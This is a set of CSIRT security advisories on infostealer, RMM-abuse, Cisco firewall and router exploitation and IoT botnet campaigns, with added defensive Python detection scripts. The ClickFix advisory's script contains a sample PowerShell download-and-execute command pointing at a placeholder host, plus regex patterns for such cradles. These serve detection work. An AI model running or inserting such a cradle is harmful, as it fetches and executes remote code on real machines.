Advisory ID: NCC-CSIRT-2025-026
Summary:
Security researchers (eSentire, The Hacker News coverage) have identified a November 2025 campaign, tracked as EVALUSION, that uses the ClickFix social-engineering technique to trick users into executing commands which lead to the installation of the Amatera Stealer (packed with PureCrypter) and the follow-on deployment of NetSupport RAT. The attack chain injects a packed Amatera DLL into MSBuild.exe, harvests browser and wallet data, then executes PowerShell to fetch and run NetSupport for persistent remote access.
Damage/Probability: High/High
Indicators of Compromise (IOCs):
IOCs change rapidly. Pull up-to-date lists from vendor CTI and your telemetry before actioning.
- Run/explorer.exe spawning msbuild.exe with injected DLLs.
- Unknown DLLs loaded into msbuild.exe or other trusted developer processes.
- PureCrypter artifacts and PowerShell one-liners contacting suspicious domains.
- NetSupport RAT beacons or console connections to unknown endpoints.
- Outbound connections to vendor-flagged malicious download/C2 domains.
Product(s):
- Microsoft Windows endpoints (workstations and servers)
- Browsers and browser-stored credentials (Chrome, Edge, Firefox) and password managers
- NetSupport RAT (remote access tooling abused as payload)
- Amatera Stealer (infostealer family) and PureCrypter (loader/crypter)
Version(s):
Not version-specific; it affects Windows systems where users execute the staged payloads. Detection and remediation depend on endpoint protections and configuration.
Platform(s):
- Enterprise and unmanaged Windows hosts
- Remote workers’ machines
- Environments where MSBuild.exe and PowerShell are allowed to run.
Description:
The campaign begins with phishing, malvertising, or compromised pages that present a ClickFix-style visual or instruction prompting the user to run a command (the “ClickFix” interaction), often via the Windows Run box or a similarly trivial user action. ClickFix is an interactive social-engineering technique designed to coax users into executing commands that would normally be blocked or inspected. Once the user follows the prompt, the chain drops a PureCrypter-packed Amatera DLL, which the actor injects into MSBuild.exe to evade detection. The stealer harvests browser credentials, cookies, crypto wallets and system artifacts, then executes a PowerShell stage that downloads and installs NetSupport RAT to provide remote control to the attacker.
Threat Types:
- Infostealer (Amatera): credential, cookie and crypto-wallet harvesting.
- Remote Access Trojan (NetSupport): full remote control and lateral movement.
- Social-engineering vector: ClickFix (interactive user trick that bypasses some security controls).
- Crypter/loader use (PureCrypter) to evade detection. (Proofpoint)
Impacts:
- Theft of browser passwords, cookies, form data, and crypto wallets.
- NetSupport RAT enables remote access and data exfiltration.
- Crypter packing and DLL injection evade signature-based detection.
- Unmanaged endpoints with corporate resources increase operational risk.
Solutions:
NCC-CSIRT recommends the following mitigation steps:
- Hunt msbuild.exe and other trusted developer processes for unknown loaded DLLs or unusual parent/child process chains.
- Monitor PowerShell for download-and-execute one-liners or encoded scripts.
- Check browser processes for unexpected child processes or access to credential stores.
- Block and alert on domains/IPs linked to PureCrypter, Amatera, and NetSupport.
- Sandbox suspicious attachments or pages that prompt users to paste commands into the Run box.
- Quarantine affected endpoints and block known malicious domains from CTI feeds.
- Enforce execution controls: restrict msbuild.exe, constrain PowerShell, block unsigned scripts.
- Rotate credentials, force reauthentication, and reset MFA if compromise is confirmed.
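The first three hunting steps above can be expressed as rules over process-creation telemetry. The following is an added example written for this advisory, not code from NCC-CSIRT or from the vendors cited; the events, paths and the placeholder URL are constructed to resemble Sysmon Event ID 1 records, and the "MSBuild launched without a project file" rule is a heuristic assumption rather than a documented campaign artifact.

```python
import re

# Constructed sample events in the shape of Windows process-creation telemetry
# (Sysmon Event ID 1 fields). They are illustrative, not captured campaign data.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 900,
     "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    # MSBuild launched from the Run box: explorer.exe is the parent, no project file given
    {"pid": 4312, "ppid": 1200,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "MSBuild.exe"},
    # Second stage: a PowerShell download cradle spawned by MSBuild (placeholder URL)
    {"pid": 4400, "ppid": 4312,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": ("powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://placeholder.invalid/stage2.ps1')\"")},
    # Benign: a developer build started from Visual Studio with a project file
    {"pid": 5000, "ppid": 3000,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": r'MSBuild.exe "C:\src\app\app.csproj" /t:Build'},
    # Benign: an administrator running an ordinary cmdlet from the Run box
    {"pid": 5100, "ppid": 1200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe Get-Service"},
]

# Command-line fragments typical of download-and-execute or encoded PowerShell stages.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|"
    r"\biex\b|invoke-expression|frombase64string|(?:^|\s)-e(?:c|nc\w*)\b",
    re.IGNORECASE,
)
# MSBuild normally receives a project or solution file; its absence is a heuristic signal.
PROJECT_FILE_RE = re.compile(r"\.(proj|csproj|vbproj|fsproj|sln|targets)\b", re.IGNORECASE)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return (pid, rule_name) pairs for events that match the hunting rules."""
    findings = []
    for ev in events:
        image = basename(ev["image"])
        parent = basename(ev["parent_image"])
        cmd = ev["cmdline"]
        if image == "msbuild.exe":
            # Run-box launches show explorer.exe as the parent of msbuild.exe
            if parent == "explorer.exe":
                findings.append((ev["pid"], "msbuild_from_explorer"))
            if not PROJECT_FILE_RE.search(cmd):
                findings.append((ev["pid"], "msbuild_without_project"))
        elif image in ("powershell.exe", "pwsh.exe"):
            if CRADLE_RE.search(cmd):
                findings.append((ev["pid"], "powershell_download_cradle"))
            # The advisory's chain: the injected MSBuild process launches PowerShell
            if parent == "msbuild.exe":
                findings.append((ev["pid"], "powershell_child_of_msbuild"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Run against the constructed events, the two campaign-shaped processes (4312 and 4400) each trigger two rules while the developer build and the plain cmdlet trigger none; in production the same rules would be run over EDR or Sysmon exports, with the project-file heuristic tuned to local build tooling.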
References:
- https://thehackernews.com/2025/11/new-evalusion-clickfix-campaign.html
- https://www.esentire.com/blog/unpacking-netsupport-rat-loaders-delivered-via-clickfix
- https://www.proofpoint.com/au/blog/threat-insight/amatera-stealer-rebranded-acr-stealer-improved-evasion-sophistication
- https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
Advisory ID: NCC-CSIRT-2025-025
Summary:
Cybercriminals are abusing trusted Remote Monitoring & Management (RMM) tools, notably LogMeIn/GoTo Resolve and PDQ Connect, to disguise malware as legitimate programs. Attackers distribute seemingly normal installers (hosted on convincing websites or delivered via phishing) that install RMM agents (or leverage their installers) and then deploy secondary malicious payloads, granting attackers remote control and persistence while blending in with legitimate administrative software.
Damage/Probability: High/High
Indicators of Compromise (IOCs):
- Fake download URLs/domains posing as legitimate vendor pages.
- MSI files mimicking PDQ Connect/LogMeIn installers that trigger unusual outbound activity.
- Unauthorized RMM agents installed on endpoints.
- Outbound C2 or remote-access connections appearing soon after an RMM agent is installed.
Product(s):
- LogMeIn/GoTo Resolve – remote access and support tool.
- PDQ Connect – remote software deployment and management tool.
- Other RMM tools (e.g., ScreenConnect, SimpleHelp, ConnectWise) were used in similar attacks.
Version(s):
Not version-specific; it affects environments where RMM agents can be installed or coerced into running with administrative privileges. Confirm vendor-specific advisories for the exact affected builds.
Platform(s):
- Windows Endpoints
- Servers
- Corporate Workstations
- Unmanaged systems where RMM agents are installed or can be side-loaded.
Description:
Recent incidents show attackers hosting convincing “software” pages or sending phishing lures that cause victims to download and run installers which either: (a) install legitimate RMM agents (PDQ Connect MSI, LogMeIn/GoTo Resolve installers) that the attacker controls or misuses; or (b) bundle an RMM installer together with a secondary malicious payload. Once the RMM agent is present with elevated privileges, the attacker uses the tool’s remote-access and management features to move laterally, execute arbitrary commands, and persist. In several reported cases, the final payloads included information-stealers and remote access frameworks. Security vendors, including AhnLab and IBM X-Force, have published analyses describing the distribution patterns and attack chains.
Notable operational details observed across reports: vendors’ legitimate agents (or their installers) are often used to lower suspicion; MSI installers are a recurring delivery artefact; attackers may combine social engineering (fake update/meeting invites) with poisoned landing pages; and sectors affected include logistics, transportation, and enterprise services.
Threat Types:
- Use of legitimate RMM tools for initial access and persistence.
- Delivery of malware through fake vendor sites or compromised installers.
- Full remote control or code execution once the RMM agent runs with admin privileges.
- Data theft, lateral movement, and deployment of additional tools (e.g., Cobalt Strike).
Impacts:
- Attackers gain remote admin control, allowing full system access, credential theft, and further malware deployment.
- Compromise of operational environments where RMM is common, enabling fraud, manipulation, or service disruption.
- Malicious actions blend with legitimate RMM activity, evading detection and bypassing simple allow-lists.
Solutions:
NCC-CSIRT recommends the following mitigation steps:
- Track all RMM installations and alert on any unauthorized agents.
- Detect installers creating new services or persistence.
- Monitor for abnormal remote-management activity or connections.
- Use EDR to flag suspicious installer-to-agent process chains.
- Block malicious installers and sandbox MSI files before approval.
- Treat any unexpected RMM installation as a high-priority incident.
- Enforce strict change-control and approvals for RMM tools.
- Include RMM-abuse scenarios in tabletop and IR playbooks.
- Work with vendors to verify installer integrity and monitor distribution channels.
- Use application allow-listing and require admin approval for new RMM tools.
- Keep an approved RMM vendor list and continuously monitor remote-access channels.
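Two of the steps above, tracking RMM installations against an approved list and flagging installer-to-agent process chains, can be implemented as a correlation over host telemetry. The following is an added example written for this advisory, not code from NCC-CSIRT, PDQ, LogMeIn/GoTo or any vendor; the host names, file paths, service names, approved-host inventory and time windows are constructed assumptions, and the event shape only approximates installer, service-creation (Windows Event 7045) and EDR connection records.

```python
from datetime import datetime, timedelta

# Name fragments of the RMM products named in the advisory and similar reports.
# Each alias maps to a canonical product key used in the approved inventory.
RMM_ALIASES = {
    "pdq-connect": "pdq-connect", "pdqconnect": "pdq-connect",
    "goto-resolve": "goto-resolve", "gotoresolve": "goto-resolve",
    "logmein": "logmein", "screenconnect": "screenconnect",
    "simplehelp": "simplehelp", "connectwise": "connectwise",
}

# Approved deployments: product key -> hosts allowed to run it (constructed inventory).
APPROVED_RMM = {"pdq-connect": {"SRV-DEPLOY01"}}

# Constructed host events (not real telemetry), already in chronological order per host.
SAMPLE_EVENTS = [
    # Unmanaged workstation: MSI run, agent service appears, connection follows within minutes
    {"ts": "2025-11-10T10:00:00", "host": "WS01", "type": "installer",
     "file": r"C:\Users\u\Downloads\PDQConnectAgent.msi"},
    {"ts": "2025-11-10T10:00:40", "host": "WS01", "type": "service_created",
     "name": "PDQ Connect Agent",
     "image": r"C:\Program Files\PDQ\PDQConnectAgent\pdq-connect-agent.exe"},
    {"ts": "2025-11-10T10:01:05", "host": "WS01", "type": "net_connect",
     "image": r"C:\Program Files\PDQ\PDQConnectAgent\pdq-connect-agent.exe",
     "dst": "203.0.113.10:443"},
    # Sanctioned deployment server running the same agent
    {"ts": "2025-11-10T09:00:00", "host": "SRV-DEPLOY01", "type": "service_created",
     "name": "PDQ Connect Agent",
     "image": r"C:\Program Files\PDQ\PDQConnectAgent\pdq-connect-agent.exe"},
    # Benign installer that creates no service
    {"ts": "2025-11-10T11:00:00", "host": "WS02", "type": "installer",
     "file": r"C:\Users\u\Downloads\office-addin-setup.msi"},
]


def rmm_product(text):
    """Return the canonical RMM product key found in a file, service or image name, else None."""
    norm = text.lower().replace(" ", "-")
    for alias, product in RMM_ALIASES.items():
        if alias in norm:
            return product
    return None


def detect(events, approved, install_window=timedelta(minutes=5),
           beacon_window=timedelta(minutes=10)):
    """Return (rule, host, service_name) tuples for unapproved agents and installer chains."""
    evs = sorted(events, key=lambda e: e["ts"])
    for e in evs:
        e["_t"] = datetime.fromisoformat(e["ts"])
    findings = []
    for svc in (e for e in evs if e["type"] == "service_created"):
        host, t = svc["host"], svc["_t"]
        # Rule 1: an RMM agent service on a host that is not in the approved inventory
        product = rmm_product(svc["name"]) or rmm_product(svc["image"])
        if product and host not in approved.get(product, set()):
            findings.append(("unapproved_rmm_agent", host, svc["name"]))
        # Rule 2: installer shortly before the service, and the new service's binary
        # making an outbound connection shortly after it was registered
        installed = any(e["type"] == "installer" and e["host"] == host
                        and t - install_window <= e["_t"] <= t for e in evs)
        beaconed = any(e["type"] == "net_connect" and e["host"] == host
                       and e["image"].lower() == svc["image"].lower()
                       and t < e["_t"] <= t + beacon_window for e in evs)
        if installed and beaconed:
            findings.append(("installer_to_agent_beacon_chain", host, svc["name"]))
    return findings


if __name__ == "__main__":
    for rule, host, name in detect(SAMPLE_EVENTS, APPROVED_RMM):
        print(f"{host}: {rule} ({name})")
```

On the constructed data WS01 is reported under both rules, the sanctioned deployment server is silent, and the benign installer on WS02 produces nothing because no service follows it; the approved inventory is the control that turns "RMM agent present" into "unexpected RMM installation", which the advisory asks to be treated as a high-priority incident.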
References:
- https://cybersecuritynews.com/hackers-exploiting-rmm-tools-logmein-and-pdq-connect/
- https://exchange.xforce.ibmcloud.com/osint/guid:bf65bd6af1cb45939d562c07edd316ae
- https://simplysecuregroup.com/hackers-exploiting-rmm-tools-logmein-and-pdq-connect-to-deploy-malware-as-a-normal-program/
- https://www.thaicert.or.th/en/2025/11/05/hackers-use-remote-monitoring-and-management-rmm-tools-to-breach-transportation-companies-and-control-cargo-shipments/
- https://www.proofpoint.com/us/blog/threat-insight/remote-access-real-cargo-cybercriminals-targeting-trucking-and-logistics
Advisory ID: NCC-CSIRT-2025-024
Summary:
Cisco has warned of a new attack variant exploiting two zero-day flaws, CVE-2025-20333 and CVE-2025-20362, in ASA and FTD VPN/Web interfaces, enabling unauthenticated RCE (Remote Code Execution), unauthorized access, and persistent DoS attacks through continuous device reloads. The campaign, active since May 2025, leverages advanced malware like RayInitiator and LINE VIPER to achieve persistence and evade detection. CISA and allied CERTs have classified the vulnerabilities as actively exploited, urging organizations to apply patches immediately, perform forensic checks (core-dumps), and restrict or rebuild compromised systems.
Damage/Probability: Critical/High
CVE(s): CVE-2025-20333 and CVE-2025-20362
Product(s):
- Cisco Secure Firewall Adaptive Security Appliance (ASA) Software
- Cisco Secure Firewall Threat Defense (FTD) Software
- Affected management interfaces: VPN/WebVPN (HTTP/HTTPS) services and related web UI components
Version(s):
Releases of ASA and FTD containing the VPN/Web server components affected by CVE-2025-20333 and CVE-2025-20362 before Cisco’s published fixes. (Confirm exact build numbers via Cisco Security Advisory.)
Platform(s):
- Enterprise and service-provider perimeter/firewall appliances (on-premises ASA hardware)
- ASAv virtual appliance
- Firepower/FTD deployments, especially devices exposing VPN web interfaces to the internet
Description:
Two related vulnerabilities disclosed in late September 2025, CVE-2025-20333 (a critical buffer-overflow/RCE in the VPN/Web server) and CVE-2025-20362 (an authorization bypass exposing restricted endpoints), have been weaponized in active campaigns. Attackers have chained these issues to execute arbitrary code as root on vulnerable ASA/FTD devices, create backdoor accounts, disable or tamper with logging, and, in the newest variant, intentionally trigger firmware reloads, producing persistent DoS conditions. Reports indicate the campaign is an evolution of the ArcaneDoor/Storm-1849 activity observed in 2024 and has delivered multiple malware strains (including RayInitiator and LINE VIPER) to affected devices.
Investigations show large numbers of internet-connected ASA/FTD devices remained unpatched as of late September 2025, providing a wide attack surface. In several cases, devices showed signs of tampering that complicate removal (e.g., persistence mechanisms beyond simple file remnants). Authorities recommend treating any evidence of compromise as serious and following forensic guidance (core dumps and coordinated analysis).
Impacts:
- Full administrative compromise
- Persistent backdoors (firmware tampering)
- Network outages via forced reboot loops
- Lateral movement into protected networks.
Solutions:
NCC-CSIRT recommends the following mitigation steps:
- Apply Cisco patches for CVE-2025-20333 and CVE-2025-20362 on all ASA/ASAv/FTD devices.
- Follow CISA ED-25-03 and rebuild any compromised or tampered devices.
- Disable unused WebVPN/admin interfaces and restrict management access.
- Rotate admin credentials, review logs, and monitor for new privileged accounts.
- Hunt for anomalies like reload loops, cleared logs, or unknown connections.
- Strengthen logging, SIEM monitoring, and alerts for unusual activities.
- Replace unsupported or legacy ASA devices lacking Secure Boot protections.
- Restrict or disable internet-facing VPN interfaces and monitor for attacks.
- Perform forensic checks for implants and coordinate with CERT or Cisco IR.
References:
- https://www.theregister.com/2025/11/06/cisco_firewall_ongoing_attacks/
- https://www.cisa.gov/news-events/directives/ed-25-03-identify-and-mitigate-potential-compromise-cisco-devices
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB
- https://www.cybersecuritydive.com/news/cisco-firewall-attack-variant-arcanedoor/805116/
- https://www.bleepingcomputer.com/news/security/cisco-actively-exploited-firewall-flaws-now-abused-for-dos-attacks/
Advisory ID: NCC-CSIRT-2025-023
Summary:
The Australian Signals Directorate (ASD) has issued an alert on BADCANDY, a malicious implant actively exploiting a critical Cisco IOS XE vulnerability (CVE-2023-20198, CVSS 10.0). The exploit allows remote attackers to gain full administrative control of Cisco routers and switches without authentication. Once compromised, attackers deploy a Lua-based backdoor (BADCANDY) to execute commands, hide traces, and maintain control of affected systems.
Over 400 devices have been compromised globally since July 2025, with active infections reported across telecommunications and internet service networks. The persistence and global spread of this campaign raise concerns that similar attacks could target telecommunication infrastructure in West Africa, including Nigeria, due to the widespread deployment of Cisco IOS XE devices in the region.
Damage/Probability: Critical/High
Product(s):
- Cisco IOS XE Software (web user interface / HTTP/HTTPS server features)
- Cisco routers and switches running IOS XE with the exposed Web UI feature
- Network edge infrastructure used by Telecom Operators, ISPs, and Government Agencies
Version(s):
All versions of Cisco IOS XE Software before the official patch for CVE-2023-20198.
Platform(s):
Edge routers and switches in enterprise, government, and service-provider networks, particularly those with Internet-exposed Web UI features.
Description:
Attackers exploit the Cisco IOS XE Web UI feature to create a privileged (level 15) account, granting full administrative rights. They then deploy the BADCANDY implant, a Lua-based web shell that executes arbitrary commands and hides malicious configuration changes.
The implant may be removed upon reboot, but attackers can regain access through previously created accounts or re-exploitation of the same vulnerability. Repeated compromises have been observed globally, confirming active and automated scanning for unpatched devices.
Technical indicators include:
- Presence of unknown or unauthorized level 15 privileged accounts (e.g., cisco_tac_admin, cisco_support, or random names).
- Unfamiliar tunnel interfaces or modified routing configurations.
- Unexpected HTTP/HTTPS access to IOS XE management ports from the Internet.
- Logs showing configuration changes outside maintenance windows.
Impacts:
- Full takeover of routers and switches, allowing interception of traffic, rerouting, and installation of additional malware.
- Data exfiltration and espionage on telecom backbones and enterprise networks.
- Reinfection risk, as ASD confirmed that unpatched devices may be compromised repeatedly even after malware removal.
- Service disruption or manipulation of routing tables, posing significant operational and regulatory risks for telecom operators and ISPs.
- Potential spillover to national networks, as similar tactics could be used against Government communication backbones or critical national infrastructure.
Solutions:
NCC-CSIRT recommends the following mitigation steps:
- Conduct an immediate security audit of all Cisco IOS XE routers, particularly those with public IP interfaces.
- Immediate patching: Apply Cisco’s official patch for CVE-2023-20198 on all affected IOS XE devices.
- Reboot and harden: Reboot patched devices to clear the implant, then disable the Web UI (ip http server / ip http secure-server) unless strictly necessary.
- Account and configuration audit:
  - Review all admin-level accounts.
  - Remove unknown or unauthorized users.
  - Inspect tunnel and interface configurations.
- Restrict access:
  - Block HTTP/HTTPS management ports (TCP/80 and 443) from public access.
  - Limit administrative access to internal management networks or VPN.
- Implement continuous monitoring:
  - Enable AAA logging for configuration changes.
  - Use SIEM tools to detect new accounts or altered configurations.
- Apply Cisco hardening guidelines for IOS XE devices used in telecom and enterprise environments.
- Network segmentation: Isolate management interfaces from operational traffic.
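The account, tunnel and Web UI checks in the technical indicators and in the audit steps above can be run as a script over an exported running-config. The following is an added example written for this advisory, not code from NCC-CSIRT, ASD or Cisco; the configuration excerpt, the secret hashes (placeholders) and the approved-admin and approved-tunnel baselines are constructed, and the only IOS XE commands it relies on are `username ... privilege 15`, `ip http server`, `ip http secure-server`, `ip http access-class` and `interface TunnelN`.

```python
import re

# Constructed IOS XE running-config excerpt for the audit (not a real device's config;
# the $9$ hashes are placeholders).
SAMPLE_CONFIG = """\
hostname EDGE-RTR-01
username netops privilege 15 secret 9 $9$PLACEHOLDERHASH1
username cisco_tac_admin privilege 15 secret 9 $9$PLACEHOLDERHASH2
username helpdesk privilege 1 secret 9 $9$PLACEHOLDERHASH3
ip http server
ip http secure-server
interface Tunnel1
 ip address 10.0.0.1 255.255.255.252
interface Tunnel99
 ip address 10.99.0.1 255.255.255.252
interface GigabitEthernet0/0/0
 ip address 192.0.2.1 255.255.255.0
"""

# Baselines the operator maintains out of band (constructed for the example).
APPROVED_ADMINS = {"netops"}
APPROVED_TUNNELS = {"Tunnel1"}

USER_RE = re.compile(r"^username (\S+) privilege (\d+)\b")
TUNNEL_RE = re.compile(r"^interface (Tunnel\d+)\b")
# Exact global-config lines that enable the Web UI; "no ip http server" will not match.
WEBUI_LINES = ("ip http server", "ip http secure-server")


def audit_config(config, approved_admins, approved_tunnels):
    """Return a dict of finding category -> list of offending config items."""
    findings = {
        "unauthorized_privilege15_user": [],  # level 15 accounts not in the baseline
        "web_ui_enabled": [],                 # HTTP/HTTPS server lines present
        "web_ui_unrestricted": [],            # Web UI on, but no access-class ACL bound
        "unknown_tunnel": [],                 # tunnel interfaces not in the baseline
    }
    http_restricted = False
    for raw in config.splitlines():
        line = raw.strip()
        m = USER_RE.match(line)
        if m and m.group(2) == "15" and m.group(1) not in approved_admins:
            findings["unauthorized_privilege15_user"].append(m.group(1))
        if line in WEBUI_LINES:
            findings["web_ui_enabled"].append(line)
        if line.startswith("ip http access-class"):
            http_restricted = True
        m = TUNNEL_RE.match(line)
        if m and m.group(1) not in approved_tunnels:
            findings["unknown_tunnel"].append(m.group(1))
    if findings["web_ui_enabled"] and not http_restricted:
        findings["web_ui_unrestricted"].append("no 'ip http access-class' configured")
    return findings


if __name__ == "__main__":
    for category, items in audit_config(SAMPLE_CONFIG, APPROVED_ADMINS, APPROVED_TUNNELS).items():
        for item in items:
            print(f"{category}: {item}")
```

On the constructed config the script reports the cisco_tac_admin account, both Web UI lines, the absence of an access-class restriction, and Tunnel99; a clean result on a device that was previously exposed is not proof of absence, since the advisory notes the implant can persist through accounts created earlier, so the baseline comparison should be repeated after every reboot and patch.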
References:
- https://www.bleepingcomputer.com/news/security/australia-warns-of-badcandy-infections-on-unpatched-cisco-devices/
- https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/badcandy
- https://thehackernews.com/2025/11/asd-warns-of-ongoing-badcandy-attacks.html
- https://securityaffairs.com/184095/hacking/badcandy-webshell-threatens-unpatched-cisco-ios-xe-devices-warns-australian-government.html
- https://cybersecuritynews.com/cisco-ios-xe-badcandy-web-shell/
- https://research.splunk.com/web/07c36cda-6567-43c3-bc1a-89dff61e2cd9/
Advisory ID: NCC-CSIRT-2025-022
Summary:
Security researchers report that the Aisuru botnet, a powerful Mirai/TurboMirai-class IoT botnet behind multiple record-scale DDoS attacks in 2025, has been retooled from covert DDoS operations into a profitable residential-proxy service model. Instead of solely launching volumetric attacks, Aisuru operators are now renting access to hundreds of thousands of compromised IoT devices as residential proxies, enabling customers (criminal and legitimate alike) to anonymize and route traffic through infected home devices. This pivot enhances the botnet’s longevity and profitability while making malicious traffic more difficult to attribute and block.
Damage/Probability: Critical/High
Product(s):
- Consumer and small-office/home (SOHO) routers and gateways
- Internet of Things (IoT) devices (IP cameras, DVRs, home gateways, routers)
- Residential broadband CPE and unmanaged devices
Version(s):
Not version-specific; it affects a wide range of unpatched or poorly secured IoT firmware and consumer router firmware versions.
Platform(s):
- Home and small-office networks
- ISP access networks
- Proxy resale marketplaces that can consume residential proxy capacity.
Description:
Aisuru is a Mirai-family/TurboMirai-class botnet that has previously been observed launching record-breaking DDoS attacks by enlisting large numbers of insecure IoT devices. Recent telemetry and reporting indicate the operator(s) have added modules and management infrastructure to enable proxy services on infected devices. Compromised devices are exposed as SOCKS/HTTP proxies or otherwise configured to relay arbitrary traffic for paying customers. The botnet retains high-volume DDoS capabilities but now offers a lower-visibility revenue stream, residential proxy rentals, which is attractive to a broad range of cybercriminal activities, including credential stuffing, ad fraud, web scraping, and evading geofencing or content takedowns.
Technical indicators observed across vendor telemetry include unusual outbound connections on proxy ports to customer controllers, persistent processes or scripts on consumer CPE performing proxying, rotation of proxy endpoints to avoid IP blocks, and reuse of known Mirai-style infection vectors (default/weak credentials, exposed administrative interfaces). Netscout/ASERT and other industry teams reported significant outbound DDoS traffic originating from end-customer devices earlier in 2025 and have documented the observable shift in operator behaviour toward proxy monetization.
Impacts:
- Large, persistent pools of geographically diverse residential IPs for criminals to anonymize and scale malicious campaigns (fraud, credential stuffing, ad-fraud, scraping).
- Increased difficulty for defenders and law enforcement to attribute malicious activity because traffic originates from legitimate residential IP addresses.
- Continued capability to mount massive DDoS attacks when operators choose to, while also monetizing assets via proxy rentals.
- Operational impact on ISPs and customers: bandwidth saturation, degraded service, and reputational exposure of affected subscribers.
Solutions:
NCC-CSIRT recommends the following mitigation steps:
- Monitor CPE for unusual outbound connections or proxy port activity (1080, 3128, 8080).
- Detect abnormal high-volume upstream traffic and excessive concurrent sessions.
- Use threat intelligence (e.g., Netscout ASERT, X-Lab) to identify Aisuru indicators.
- Block or throttle connections to known C2 and proxy domains.
- Push firmware updates and advise customers to secure or replace vulnerable IoT devices.
- Enforce strong authentication (MFA, rate limits) and monitor for proxy-like traffic patterns.
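The first two monitoring steps above (proxy-port activity, abnormal upstream volume and excessive concurrent sessions from a CPE) can be scored from flow records. The following is an added example written for this advisory, not code from NCC-CSIRT, Netscout/ASERT or any vendor; the flow records, subscriber addresses and the three thresholds are constructed assumptions that an ISP would tune to its own baseline.

```python
from datetime import datetime, timedelta

# Destination ports the advisory lists as typical proxy ports.
PROXY_PORTS = {1080, 3128, 8080}


def _flow(src, dst, port, start, minutes, bytes_out):
    """Build one flow record (constructed helper; a real feed would be NetFlow/IPFIX)."""
    s = datetime.fromisoformat(start)
    return {"src": src, "dst": dst, "dst_port": port, "start": s,
            "end": s + timedelta(minutes=minutes), "bytes_out": bytes_out}


# Constructed flow records for two subscriber CPE devices (not real telemetry).
SAMPLE_FLOWS = []
# Suspect CPE: 40 overlapping outbound sessions to 40 distinct hosts on port 1080,
# the shape of a device relaying traffic for proxy customers.
for i in range(40):
    SAMPLE_FLOWS.append(_flow("198.51.100.7", f"203.0.113.{i + 1}", 1080,
                              "2025-10-20T02:00:00", 30, 8_000_000))
# Benign CPE: three short, non-overlapping HTTPS sessions.
for i in range(3):
    SAMPLE_FLOWS.append(_flow("198.51.100.8", f"192.0.2.{i + 1}", 443,
                              f"2025-10-20T02:{i * 10:02d}:00", 5, 200_000))


def max_concurrent(flows):
    """Peak number of simultaneously open sessions, via a start/end sweep."""
    events = []
    for f in flows:
        events.append((f["start"], 1))
        events.append((f["end"], -1))
    events.sort()  # at equal timestamps -1 sorts before +1, so touching sessions do not overlap
    current = peak = 0
    for _, delta in events:
        current += delta
        peak = max(peak, current)
    return peak


def assess(flows, proxy_flow_threshold=10, concurrency_threshold=20,
           upstream_threshold=100_000_000):
    """Return {source_ip: [reasons]} for subscribers whose traffic looks proxy-like."""
    by_src = {}
    for f in flows:
        by_src.setdefault(f["src"], []).append(f)
    report = {}
    for src, fl in by_src.items():
        reasons = []
        if sum(1 for f in fl if f["dst_port"] in PROXY_PORTS) >= proxy_flow_threshold:
            reasons.append("proxy_port_activity")
        if max_concurrent(fl) >= concurrency_threshold:
            reasons.append("high_concurrency")
        if sum(f["bytes_out"] for f in fl) >= upstream_threshold:
            reasons.append("high_upstream_volume")
        if reasons:
            report[src] = reasons
    return report


if __name__ == "__main__":
    for src, reasons in assess(SAMPLE_FLOWS).items():
        print(f"{src}: {', '.join(reasons)}")
```

Because an infected CPE relays traffic for many unrelated customers, the concurrency and destination-diversity signals are usually stronger than any single destination or port, which matters once operators rotate proxy endpoints to evade blocklists; the port list is a weak signal on its own and is combined here with volume and concurrency for that reason.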
References:
- https://krebsonsecurity.com/2025/10/aisuru-botnet-shifts-from-ddos-to-residential-proxies/
- https://www.netscout.com/blog/asert/asert-threat-summary-aisuru-and-related-turbomirai-botnet-ddos
- https://securityaffairs.com/183969/malware/aisuru-botnet-is-behind-record-20tb-sec-ddos-attacks.html
- https://www.securityweek.com/turbomirai-class-aisuru-botnet-blamed-for-20-tbps-ddos-attacks/
- https://www.csoonline.com/article/4071594/aisurus-30-tbps-botnet-traffic-crashes-through-major-us-isps.html